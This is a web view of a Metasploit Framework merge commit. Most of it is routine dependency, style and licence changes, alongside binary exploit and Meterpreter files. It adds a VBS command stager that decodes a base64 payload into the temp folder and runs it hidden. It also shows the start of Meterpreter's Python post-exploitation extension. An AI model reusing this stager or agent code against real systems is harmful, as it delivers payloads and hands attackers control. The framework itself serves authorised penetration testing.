Browse Source

Merge branch 'rapid7' into cleanup/remove-id-tags

Conflicts:
	lib/msf/core/payload/osx/bundleinject.rb
	lib/msf/core/payload/windows/dllinject.rb
	lib/msf/core/payload/windows/exec.rb
	lib/msf/core/payload/windows/loadlibrary.rb
	lib/msf/core/payload/windows/reflectivedllinject.rb
	lib/msf/core/payload/windows/x64/reflectivedllinject.rb
	scripts/meterpreter/netenum.rb
James Lee 6 years ago
parent
commit
c77d49a640
100 changed files with 4851 additions and 2663 deletions
  1. 5
    4
      .gitignore
  2. 2
    0
      .mailmap
  3. 1
    0
      .ruby-gemset
  4. 1
    0
      .ruby-version
  5. 6
    0
      CONTRIBUTING.md
  6. 2
    2
      COPYING
  7. 6
    4
      Gemfile
  8. 35
    35
      Gemfile.lock
  9. 6
    5
      HACKING
  10. 1
    1
      README.md
  11. BIN
      data/android/apk/AndroidManifest.xml
  12. BIN
      data/android/apk/classes.dex
  13. BIN
      data/android/apk/res/drawable-mdpi/icon.png
  14. BIN
      data/android/apk/res/layout/main.xml
  15. BIN
      data/android/apk/resources.arsc
  16. BIN
      data/android/meterpreter.jar
  17. BIN
      data/android/metstage.jar
  18. BIN
      data/android/shell.jar
  19. BIN
      data/exploits/CVE-2013-2171.bin
  20. BIN
      data/exploits/CVE-2013-2465/Exploit$MyColorModel.class
  21. BIN
      data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class
  22. BIN
      data/exploits/CVE-2013-2465/Exploit.class
  23. 49
    0
      data/exploits/cmdstager/vbs_b64_noquot
  24. BIN
      data/exploits/cve-2013-0758.swf
  25. BIN
      data/exploits/cve-2013-1488/Exploit.class
  26. BIN
      data/exploits/cve-2013-1488/FakeDriver.class
  27. BIN
      data/exploits/cve-2013-1488/FakeDriver2.class
  28. 1
    0
      data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
  29. 2
    0
      data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
  30. BIN
      data/exploits/cve-2013-2460/DisableSecurityManagerAction.class
  31. BIN
      data/exploits/cve-2013-2460/ExpProvider.class
  32. BIN
      data/exploits/cve-2013-2460/Exploit.class
  33. BIN
      data/exploits/cve-2013-3660/exploit.dll
  34. BIN
      data/meterpreter/elevator.dll
  35. BIN
      data/meterpreter/elevator.x64.dll
  36. BIN
      data/meterpreter/elevator.x86.dll
  37. BIN
      data/meterpreter/ext_server_espia.dll
  38. BIN
      data/meterpreter/ext_server_espia.x64.dll
  39. BIN
      data/meterpreter/ext_server_espia.x86.dll
  40. BIN
      data/meterpreter/ext_server_incognito.dll
  41. BIN
      data/meterpreter/ext_server_incognito.x64.dll
  42. BIN
      data/meterpreter/ext_server_incognito.x86.dll
  43. BIN
      data/meterpreter/ext_server_lanattacks.dll
  44. BIN
      data/meterpreter/ext_server_lanattacks.x64.dll
  45. BIN
      data/meterpreter/ext_server_lanattacks.x86.dll
  46. BIN
      data/meterpreter/ext_server_mimikatz.dll
  47. BIN
      data/meterpreter/ext_server_mimikatz.x64.dll
  48. BIN
      data/meterpreter/ext_server_mimikatz.x86.dll
  49. BIN
      data/meterpreter/ext_server_priv.dll
  50. BIN
      data/meterpreter/ext_server_priv.x64.dll
  51. BIN
      data/meterpreter/ext_server_priv.x86.dll
  52. BIN
      data/meterpreter/ext_server_sniffer.dll
  53. BIN
      data/meterpreter/ext_server_sniffer.x64.dll
  54. BIN
      data/meterpreter/ext_server_sniffer.x86.dll
  55. BIN
      data/meterpreter/ext_server_stdapi.dll
  56. BIN
      data/meterpreter/ext_server_stdapi.jar
  57. 865
    0
      data/meterpreter/ext_server_stdapi.py
  58. BIN
      data/meterpreter/ext_server_stdapi.x64.dll
  59. BIN
      data/meterpreter/ext_server_stdapi.x86.dll
  60. BIN
      data/meterpreter/meterpreter.jar
  61. 415
    0
      data/meterpreter/meterpreter.py
  62. BIN
      data/meterpreter/metsrv.dll
  63. BIN
      data/meterpreter/metsrv.x64.dll
  64. BIN
      data/meterpreter/metsrv.x86.dll
  65. BIN
      data/meterpreter/screenshot.dll
  66. BIN
      data/meterpreter/screenshot.x64.dll
  67. BIN
      data/meterpreter/screenshot.x86.dll
  68. 24
    0
      data/templates/scripts/to_exe.asp.template
  69. 30
    0
      data/templates/scripts/to_exe.aspx.template
  70. 81
    0
      data/templates/scripts/to_exe.vba.template
  71. 24
    0
      data/templates/scripts/to_exe.vbs.template
  72. 49
    0
      data/templates/scripts/to_exe_jsp.war.template
  73. 32
    0
      data/templates/scripts/to_mem.vba.template
  74. 30
    0
      data/templates/scripts/to_mem_dotnet.ps1.template
  75. 20
    0
      data/templates/scripts/to_mem_old.ps1.template
  76. 1024
    0
      data/wordlists/burnett_top_1024.txt
  77. 500
    0
      data/wordlists/burnett_top_500.txt
  78. 8
    0
      data/wordlists/http_owa_common.txt
  79. 1000
    0
      data/wordlists/ipmi_passwords.txt
  80. 5
    0
      data/wordlists/ipmi_users.txt
  81. 34
    64
      db/schema.rb
  82. 4
    5
      documentation/samples/modules/auxiliary/sample.rb
  83. 2
    2
      documentation/samples/modules/encoders/sample.rb
  84. 147
    0
      documentation/samples/modules/exploits/ie_browser.rb
  85. 12
    11
      documentation/samples/modules/exploits/sample.rb
  86. 2
    2
      documentation/samples/modules/nops/sample.rb
  87. 1
    1
      documentation/samples/modules/payloads/singles/sample.rb
  88. 40
    0
      documentation/samples/modules/post/sample.rb
  89. 132
    0
      documentation/samples/scripts/resource_script.rb
  90. 0
    459
      external/pcaprub/LICENSE
  91. 0
    43
      external/pcaprub/README
  92. 0
    117
      external/pcaprub/extconf.rb
  93. 0
    816
      external/pcaprub/netifaces.c
  94. 0
    184
      external/pcaprub/netifaces.h
  95. 0
    783
      external/pcaprub/pcaprub.c
  96. 0
    125
      external/pcaprub/test_pcaprub.rb
  97. 2
    0
      external/source/exploits/CVE-2013-2171/Makefile
  98. 54
    0
      external/source/exploits/CVE-2013-2171/exploit.c
  99. 197
    0
      external/source/exploits/CVE-2013-2465/Exploit.java
  100. 0
    0
      external/source/exploits/CVE-2013-2465/Makefile

+ 5
- 4
.gitignore View File

@@ -1,10 +1,9 @@
1 1
 .bundle
2 2
 # Rubymine project directory
3 3
 .idea
4
-# Portable ruby version files for rvm
5
-.ruby-gemset
6
-.ruby-version
7
-# RVM control file
4
+# Sublime Text project directory (not created by ST by default)
5
+.sublime-project
6
+# RVM control file, keep this to avoid backdooring Metasploit
8 7
 .rvmrc
9 8
 # YARD cache directory
10 9
 .yardoc
@@ -40,3 +39,5 @@ tags
40 39
 *.orig
41 40
 *.rej
42 41
 *~
42
+# Ignore backups of retabbed files
43
+*.notab

+ 2
- 0
.mailmap View File

@@ -27,6 +27,8 @@ wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
27 27
 # periodically. If you're on this list and would like to not be, just
28 28
 # let todb@metasploit.com know.
29 29
 
30
+Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
31
+Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
30 32
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
31 33
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
32 34
 FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>

+ 1
- 0
.ruby-gemset View File

@@ -0,0 +1 @@
1
+metasploit-framework

+ 1
- 0
.ruby-version View File

@@ -0,0 +1 @@
1
+ruby-1.9.3-p448

+ 6
- 0
CONTRIBUTING.md View File

@@ -36,3 +36,9 @@ Pull requests tend to be very collaborative for Metasploit -- do not be
36 36
 surprised if your pull request to rapid7/metasploit-framework triggers a
37 37
 pull request back to your own fork. In this way, we can isolate working
38 38
 changes before landing your PR to the Metasploit master branch.
39
+
40
+To save yourself the embarrassment of committing common errors, you will
41
+want to symlink the `msftidy.rb` utility to your pre-commit hooks by
42
+running `ln -s ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit`
43
+from the top-level directory of your metasploit-framework clone. This
44
+will prevent you from committing modules that raise WARNINGS or ERRORS.

+ 2
- 2
COPYING View File

@@ -11,7 +11,7 @@ are permitted provided that the following conditions are met:
11 11
 	  this list of conditions and the following disclaimer in the documentation
12 12
 	  and/or other materials provided with the distribution.
13 13
 
14
-    * Neither the name of Rapid7 LLC nor the names of its contributors
14
+    * Neither the name of Rapid7, Inc. nor the names of its contributors
15 15
 	  may be used to endorse or promote products derived from this software
16 16
 	  without specific prior written permission.
17 17
 
@@ -30,7 +30,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 30
 
31 31
 The Metasploit Framework is provided under the 3-clause BSD license above.
32 32
 
33
-The copyright on this package is held by Rapid7 LLC.
33
+The copyright on this package is held by Rapid7, Inc.
34 34
 
35 35
 This license does not apply to several components within the Metasploit
36 36
 Framework source tree.  For more details see the LICENSE file.

+ 6
- 4
Gemfile View File

@@ -10,17 +10,20 @@ gem 'msgpack'
10 10
 gem 'nokogiri'
11 11
 # Needed by anemone crawler
12 12
 gem 'robots'
13
+# Needed by db.rb and Msf::Exploit::Capture
14
+gem 'packetfu', '1.1.9'
13 15
 
14 16
 group :db do
15 17
 	# Needed for Msf::DbManager
16 18
 	gem 'activerecord'
17 19
 	# Database models shared between framework and Pro.
18
-	gem 'metasploit_data_models', '~> 0.14.3'
20
+	gem 'metasploit_data_models', '~> 0.16.6'
19 21
 	# Needed for module caching in Mdm::ModuleDetails
20 22
 	gem 'pg', '>= 0.11'
21 23
 end
22 24
 
23 25
 group :pcap do
26
+  gem 'network_interface', '~> 0.0.1'
24 27
 	# For sniffer and raw socket modules
25 28
 	gem 'pcaprub'
26 29
 end
@@ -38,7 +41,7 @@ group :development, :test do
38 41
 	# 'FactoryGirl.' in factory definitions syntax.
39 42
 	gem 'factory_girl', '>= 4.1.0'
40 43
 	# running documentation generation tasks and rspec tasks
41
-	gem 'rake'
44
+	gem 'rake', '>= 10.0.0'
42 45
 end
43 46
 
44 47
 group :test do
@@ -48,11 +51,10 @@ group :test do
48 51
 	gem 'database_cleaner'
49 52
 	# testing framework
50 53
 	gem 'rspec', '>= 2.12'
51
-	# add matchers from shoulda, such as query_the_database, which is useful for
52
-	# testing that the Msf::DBManager activation is respected.
53 54
 	gem 'shoulda-matchers'
54 55
 	# code coverage for tests
55 56
 	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
57
+	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
56 58
 	gem 'simplecov', '0.5.4', :require => false
57 59
 	# Manipulate Time.now in specs
58 60
 	gem 'timecop'

+ 35
- 35
Gemfile.lock View File

@@ -1,60 +1,58 @@
1 1
 GEM
2 2
   remote: http://rubygems.org/
3 3
   specs:
4
-    activemodel (3.2.13)
5
-      activesupport (= 3.2.13)
4
+    activemodel (3.2.14)
5
+      activesupport (= 3.2.14)
6 6
       builder (~> 3.0.0)
7
-    activerecord (3.2.13)
8
-      activemodel (= 3.2.13)
9
-      activesupport (= 3.2.13)
7
+    activerecord (3.2.14)
8
+      activemodel (= 3.2.14)
9
+      activesupport (= 3.2.14)
10 10
       arel (~> 3.0.2)
11 11
       tzinfo (~> 0.3.29)
12
-    activesupport (3.2.13)
13
-      i18n (= 0.6.1)
12
+    activesupport (3.2.14)
13
+      i18n (~> 0.6, >= 0.6.4)
14 14
       multi_json (~> 1.0)
15 15
     arel (3.0.2)
16
-    bourne (1.4.0)
17
-      mocha (~> 0.13.2)
18 16
     builder (3.0.4)
19
-    database_cleaner (0.9.1)
20
-    diff-lcs (1.2.2)
17
+    database_cleaner (1.1.1)
18
+    diff-lcs (1.2.4)
21 19
     factory_girl (4.2.0)
22 20
       activesupport (>= 3.0.0)
23
-    i18n (0.6.1)
24
-    json (1.7.7)
25
-    metaclass (0.0.1)
26
-    metasploit_data_models (0.14.3)
21
+    i18n (0.6.5)
22
+    json (1.8.0)
23
+    metasploit_data_models (0.16.6)
27 24
       activerecord (>= 3.2.13)
28 25
       activesupport
29 26
       pg
30
-    mocha (0.13.3)
31
-      metaclass (~> 0.0.1)
32
-    msgpack (0.5.4)
27
+    mini_portile (0.5.1)
28
+    msgpack (0.5.5)
33 29
     multi_json (1.0.4)
34
-    nokogiri (1.5.9)
30
+    network_interface (0.0.1)
31
+    nokogiri (1.6.0)
32
+      mini_portile (~> 0.5.0)
33
+    packetfu (1.1.9)
35 34
     pcaprub (0.11.3)
36
-    pg (0.15.1)
37
-    rake (10.0.4)
38
-    redcarpet (2.2.2)
35
+    pg (0.16.0)
36
+    rake (10.1.0)
37
+    redcarpet (3.0.0)
39 38
     robots (0.10.1)
40
-    rspec (2.13.0)
41
-      rspec-core (~> 2.13.0)
42
-      rspec-expectations (~> 2.13.0)
43
-      rspec-mocks (~> 2.13.0)
44
-    rspec-core (2.13.1)
45
-    rspec-expectations (2.13.0)
39
+    rspec (2.14.1)
40
+      rspec-core (~> 2.14.0)
41
+      rspec-expectations (~> 2.14.0)
42
+      rspec-mocks (~> 2.14.0)
43
+    rspec-core (2.14.5)
44
+    rspec-expectations (2.14.2)
46 45
       diff-lcs (>= 1.1.3, < 2.0)
47
-    rspec-mocks (2.13.0)
48
-    shoulda-matchers (1.5.2)
46
+    rspec-mocks (2.14.3)
47
+    shoulda-matchers (2.3.0)
49 48
       activesupport (>= 3.0.0)
50
-      bourne (~> 1.3)
51 49
     simplecov (0.5.4)
52 50
       multi_json (~> 1.0.3)
53 51
       simplecov-html (~> 0.5.3)
54 52
     simplecov-html (0.5.3)
55
-    timecop (0.6.1)
53
+    timecop (0.6.3)
56 54
     tzinfo (0.3.37)
57
-    yard (0.8.5.2)
55
+    yard (0.8.7)
58 56
 
59 57
 PLATFORMS
60 58
   ruby
@@ -65,12 +63,14 @@ DEPENDENCIES
65 63
   database_cleaner
66 64
   factory_girl (>= 4.1.0)
67 65
   json
68
-  metasploit_data_models (~> 0.14.3)
66
+  metasploit_data_models (~> 0.16.6)
69 67
   msgpack
68
+  network_interface (~> 0.0.1)
70 69
   nokogiri
70
+  packetfu (= 1.1.9)
71 71
   pcaprub
72 72
   pg (>= 0.11)
73
-  rake
73
+  rake (>= 10.0.0)
74 74
   redcarpet
75 75
   robots
76 76
   rspec (>= 2.12)

+ 6
- 5
HACKING View File

@@ -9,8 +9,8 @@ Code Style
9 9
 In order to maintain consistency and readability, we ask that you
10 10
 adhere to the following style guidelines:
11 11
 
12
- - Hard tabs, not spaces
13
- - Try to keep your lines under 100 columns (assuming four-space tabs)
12
+ - Standard Ruby two-space soft tabs, not hard tabs.
13
+ - Try to keep your lines under 100 columns (assuming two-space tabs)
14 14
  - do; end instead of {} for a block
15 15
  - Always use str[0,1] instead of str[0]
16 16
    (This avoids a known ruby 1.8/1.9 incompatibility.)
@@ -37,9 +37,10 @@ need user input, you can either register an option or expose an
37 37
 interactive session type specific for the type of exploit.
38 38
 
39 39
 3. Don't use "sleep". It has been known to cause issues with
40
-multi-threaded programs on various platforms. Instead, we use
41
-"select(nil, nil, nil, <time>)" throughout the framework. We have
42
-found this works around the underlying issue.
40
+multi-threaded programs on various platforms running an older version of
41
+Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
42
+Rex.sleep() throughout the framework. We have found this works around
43
+the underlying issue.
43 44
 
44 45
 4. Always use Rex sockets, not ruby sockets.  This includes
45 46
 third-party libraries such as Net::Http.  There are several very good

+ 1
- 1
README.md View File

@@ -47,7 +47,7 @@ pull request. For slightly more info, see
47 47
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
48 48
 
49 49
 
50
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
50
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
51 51
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
52 52
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
53 53
 [unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"

BIN
data/android/apk/AndroidManifest.xml View File


BIN
data/android/apk/classes.dex View File


BIN
data/android/apk/res/drawable-mdpi/icon.png View File


BIN
data/android/apk/res/layout/main.xml View File


BIN
data/android/apk/resources.arsc View File


BIN
data/android/meterpreter.jar View File


BIN
data/android/metstage.jar View File


BIN
data/android/shell.jar View File


BIN
data/exploits/CVE-2013-2171.bin View File


BIN
data/exploits/CVE-2013-2465/Exploit$MyColorModel.class View File


BIN
data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class View File


BIN
data/exploits/CVE-2013-2465/Exploit.class View File


+ 49
- 0
data/exploits/cmdstager/vbs_b64_noquot View File

@@ -0,0 +1,49 @@
1
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
2
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
3
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
4
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
5
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
6
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
7
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
8
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
9
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
10
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
11
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
12
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
13
+echo If file.Size Then >>decode_stub
14
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
15
+echo data = fd.ReadAll >>decode_stub
16
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
17
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
18
+echo data = base64_decode(data) >>decode_stub
19
+echo fd.Close >>decode_stub
20
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
21
+echo ofs.Write data >>decode_stub
22
+echo ofs.close >>decode_stub
23
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
24
+echo Else >>decode_stub
25
+echo Wscript.Echo emptyString >>decode_stub
26
+echo End If >>decode_stub
27
+echo Function base64_decode(byVal strIn) >>decode_stub
28
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
29
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
30
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
31
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
32
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
33
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
34
+echo If Not w2 Then _ >>decode_stub
35
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
36
+echo If  Not w3 Then _ >>decode_stub
37
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
38
+echo If Not w4 Then _ >>decode_stub
39
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
40
+echo Next >>decode_stub
41
+echo base64_decode = strOut >>decode_stub
42
+echo End Function >>decode_stub
43
+echo Function mimedecode(byVal strIn) >>decode_stub
44
+echo If Len(strIn) = 0 Then >>decode_stub
45
+echo mimedecode = -1 : Exit Function >>decode_stub
46
+echo Else >>decode_stub
47
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
48
+echo End If >>decode_stub
49
+echo End Function >>decode_stub

BIN
data/exploits/cve-2013-0758.swf View File


BIN
data/exploits/cve-2013-1488/Exploit.class View File


BIN
data/exploits/cve-2013-1488/FakeDriver.class View File


BIN
data/exploits/cve-2013-1488/FakeDriver2.class View File


+ 1
- 0
data/exploits/cve-2013-1488/META-INF/services/java.lang.Object View File

@@ -0,0 +1 @@
1
+com.sun.script.javascript.RhinoScriptEngine

+ 2
- 0
data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver View File

@@ -0,0 +1,2 @@
1
+FakeDriver
2
+FakeDriver2

BIN
data/exploits/cve-2013-2460/DisableSecurityManagerAction.class View File


BIN
data/exploits/cve-2013-2460/ExpProvider.class View File


BIN
data/exploits/cve-2013-2460/Exploit.class View File


BIN
data/exploits/cve-2013-3660/exploit.dll View File


BIN
data/meterpreter/elevator.dll View File


BIN
data/meterpreter/elevator.x64.dll View File


BIN
data/meterpreter/elevator.x86.dll View File


BIN
data/meterpreter/ext_server_espia.dll View File


BIN
data/meterpreter/ext_server_espia.x64.dll View File


BIN
data/meterpreter/ext_server_espia.x86.dll View File


BIN
data/meterpreter/ext_server_incognito.dll View File


BIN
data/meterpreter/ext_server_incognito.x64.dll View File


BIN
data/meterpreter/ext_server_incognito.x86.dll View File


BIN
data/meterpreter/ext_server_lanattacks.dll View File


BIN
data/meterpreter/ext_server_lanattacks.x64.dll View File


BIN
data/meterpreter/ext_server_lanattacks.x86.dll View File


BIN
data/meterpreter/ext_server_mimikatz.dll View File


BIN
data/meterpreter/ext_server_mimikatz.x64.dll View File


BIN
data/meterpreter/ext_server_mimikatz.x86.dll View File


BIN
data/meterpreter/ext_server_priv.dll View File


BIN
data/meterpreter/ext_server_priv.x64.dll View File


BIN
data/meterpreter/ext_server_priv.x86.dll View File


BIN
data/meterpreter/ext_server_sniffer.dll View File


BIN
data/meterpreter/ext_server_sniffer.x64.dll View File


BIN
data/meterpreter/ext_server_sniffer.x86.dll View File


BIN
data/meterpreter/ext_server_stdapi.dll View File


BIN
data/meterpreter/ext_server_stdapi.jar View File


+ 865
- 0
data/meterpreter/ext_server_stdapi.py View File

@@ -0,0 +1,865 @@
1
+import ctypes
2
+import fnmatch
3
+import getpass
4
+import os
5
+import platform
6
+import shlex
7
+import shutil
8
+import socket
9
+import struct
10
+import subprocess
11
+import sys
12
+
13
+has_windll = hasattr(ctypes, 'windll')
14
+
15
+try:
16
+	import pty
17
+	has_pty = True
18
+except ImportError:
19
+	has_pty = False
20
+
21
+try:
22
+	import pwd
23
+	has_pwd = True
24
+except ImportError:
25
+	has_pwd = False
26
+
27
+try:
28
+	import termios
29
+	has_termios = True
30
+except ImportError:
31
+	has_termios = False
32
+
33
+try:
34
+	import _winreg as winreg
35
+	has_winreg = True
36
+except ImportError:
37
+	has_winreg = False
38
+
39
+class PROCESSENTRY32(ctypes.Structure):
40
+	_fields_ = [("dwSize", ctypes.c_uint32),
41
+		("cntUsage", ctypes.c_uint32),
42
+		("th32ProcessID", ctypes.c_uint32),
43
+		("th32DefaultHeapID", ctypes.c_void_p),
44
+		("th32ModuleID", ctypes.c_uint32),
45
+		("cntThreads", ctypes.c_uint32),
46
+		("th32ParentProcessID", ctypes.c_uint32),
47
+		("thPriClassBase", ctypes.c_int32),
48
+		("dwFlags", ctypes.c_uint32),
49
+		("szExeFile", (ctypes.c_char * 260))]
50
+
51
+class SYSTEM_INFO(ctypes.Structure):
52
+	_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
53
+		("wReserved", ctypes.c_uint16),
54
+		("dwPageSize", ctypes.c_uint32),
55
+		("lpMinimumApplicationAddress", ctypes.c_void_p),
56
+		("lpMaximumApplicationAddress", ctypes.c_void_p),
57
+		("dwActiveProcessorMask", ctypes.c_uint32),
58
+		("dwNumberOfProcessors", ctypes.c_uint32),
59
+		("dwProcessorType", ctypes.c_uint32),
60
+		("dwAllocationGranularity", ctypes.c_uint32),
61
+		("wProcessorLevel", ctypes.c_uint16),
62
+		("wProcessorRevision", ctypes.c_uint16),]
63
+
64
+class SID_AND_ATTRIBUTES(ctypes.Structure):
65
+	_fields_ = [("Sid", ctypes.c_void_p),
66
+		("Attributes", ctypes.c_uint32),]
67
+
68
+##
69
+# STDAPI
70
+##
71
+
72
+#
73
+# TLV Meta Types
74
+#
75
+TLV_META_TYPE_NONE =       (   0   )
76
+TLV_META_TYPE_STRING =     (1 << 16)
77
+TLV_META_TYPE_UINT =       (1 << 17)
78
+TLV_META_TYPE_RAW =        (1 << 18)
79
+TLV_META_TYPE_BOOL =       (1 << 19)
80
+TLV_META_TYPE_COMPRESSED = (1 << 29)
81
+TLV_META_TYPE_GROUP =      (1 << 30)
82
+TLV_META_TYPE_COMPLEX =    (1 << 31)
83
+# not defined in original
84
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
85
+
86
+#
87
+# TLV Specific Types
88
+#
89
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
90
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
91
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
92
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
93
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
94
+
95
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
96
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
97
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
98
+
99
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
100
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
101
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
102
+
103
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
104
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
105
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
106
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
107
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
108
+
109
+##
110
+# General
111
+##
112
+TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
113
+TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
114
+TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
115
+TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
116
+
117
+##
118
+# Fs
119
+##
120
+TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
121
+TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
122
+TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
123
+TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
124
+TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
125
+
126
+TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
127
+
128
+TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
129
+TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
130
+TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
131
+TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
132
+
133
+##
134
+# Net
135
+##
136
+TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
137
+TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
138
+
139
+TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
140
+TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
141
+TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
142
+TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
143
+
144
+TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
145
+TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
146
+TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
147
